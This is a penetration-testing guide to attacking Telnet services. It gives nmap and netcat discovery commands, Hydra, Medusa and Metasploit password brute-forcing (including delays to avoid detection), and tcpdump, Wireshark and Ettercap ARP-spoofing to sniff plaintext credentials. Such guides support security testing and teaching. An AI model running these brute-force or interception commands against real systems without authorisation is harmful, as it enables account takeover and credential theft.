Pentesting Telnet

Telnet 23
Telnet is a network protocol used for remote system access and management over an unsecured connection. Unlike SSH, it lacks encryption, making it highly vulnerable to interception and credential theft. For penetration testers, Telnet serves as a valuable target for identifying weak authentication, sniffing plaintext credentials, and demonstrating the risks of using insecure remote access services in security assessments.

Discovery and Enumeration

Before attempting exploitation, confirming that Telnet is running on a target is essential. You can use several network scanning techniques detailed here to identify potential targets to test for Telnet.

Scanning for Telnet Services

You can use the Nmap tool to detect Telnet services across a network or specific target.

nmap -p 23 10.1.1.1                              #Scan for open Telnet port on a single target
nmap -p 23 10.1.1.0/24                           #Scan for open Telnet ports on a subnet     
nmap -p 23 -iL targets.txt                       #Scan for open Telnet ports for a list of targets
nmap -p 23 -sV 10.1.1.1                          #Detect service version
nmap -p 23 --script=telnet-ntlm-info 10.1.1.1    #Check if NTLM authentication is enabled

Banner grabbing can reveal details that can be used in further attacks against the application, device, etc, such as system information, OS details, or authentication prompts.

Using Netcat

nc -vn 10.1.1.1 23

Using Telnet Client

telnet 10.1.1.1 23

If the connection is successful, you might see the following to confirm:

Connected to <target-ip>.
Escape character is '^]'.
Welcome to XYZ Server!
Login:

Using Metasploit

use auxiliary/scanner/telnet/telnet_version
set RHOSTS 10.1.1.1
run

Brute-Forcing Telnet

Telnet is often configured with weak, none or default passwords. It is often enabled by default without network teams or sysadmins realising and has publically known default credentials. The following are some tools used to brute-force Telnet.

Hydra

hydra -l <username> -p <password> -s 23 10.1.1.1 telnet                                                                    #Test for a specific username and password
hydra -l <username> -P passwords.txt -s 23 10.1.1.1 telnet                                                                 #Brute-force a single username with a password list
hydra -L /path/to/usernames.txt -P passwords.txt -s 23 10.1.1.1 telnet                                                     #Brute-force multiple usernames and passwords
hydra -C ~/SecLists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt -s 23 10.1.1.1 telnet                   #Brute-force using username-password combinations
hydra -C ~/SecLists/Passwords/Default-Credentials/telnet-betterdefaultpasslist.txt -s 23 -M SSH_Targets.txt telnet         #Brute-force using username-password combinations for a list of SSH servers

Medusa

medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet                   #Brute-force Telnet with a single username and a password list
medusa -H hosts.txt -u admin -P passwords.txt -M telnet                  #Brute-force Telnet on multiple hosts from a file
medusa -h 10.1.1.1 -U users.txt -P passwords.txt -M telnet               #Brute-force Telnet using a list of usernames and passwords
medusa -h 10.1.1.1 -u admin -p password123 -M telnet                     #Attempt a single username and password combination
medusa -h 10.1.1.1 -U users.txt -p password123 -M telnet                 #Brute-force Telnet with a single password and a user list
medusa -h 10.1.1.1 -U users.txt -P passwords.txt -M telnet -n 23         #Specify port 23 for Telnet brute-forcing
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -t 5              #Limit concurrent threads to 5 for controlled brute-forcing
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -T 3              #Set a timeout of 3 seconds per attempt
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -f                #Stop on the first successful login
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -O output.txt     #Save results to an output file
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -v 6              #Enable verbose mode for detailed output
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -w 5              #Add a 5-second delay between attempts to avoid detection
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -q                #Quiet mode to suppress unnecessary output
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -R                #Resume a previous session if interrupted
medusa -h 10.1.1.1 -u admin -P passwords.txt -M telnet -m AUTH:ntlm      #Use NTLM authentication if supported by the Telnet service

Metasploit

use auxiliary/scanner/telnet/telnet_login
set RHOSTS 10.1.1.1
set USERNAME admin
set PASSWORD_FILE /usr/share/wordlists/rockyou.txt
run

Man-in-the-Middle and Traffic Sniffing

Just like with FTP, Telnet transmits credentials in plaintext. Attackers can intercept login attempts using packet sniffers and grab credentials from the network traffic.

Wireshark

You can use the Wireshark tool:

  • Open Wireshark and start capturing traffic on the network interface.
  • Apply the filter:
tcp.port == 23
  • Look for captured Telnet session packets and extract credentials.

Tcpdump

Tcpdump is another tool to capture Telnet traffic on a network. The following  will display Telnet traffic in plaintext, including usernames and passwords.

tcpdump -i eth0 port 23 -A

Using Ettercap for MITM

If you’re on the same network as the target, you can use the Ettercap tool to capture a victim’s credentials when they login to Telnet.

ettercap -T -M arp:remote /<victim-IP>/ /<router-IP>/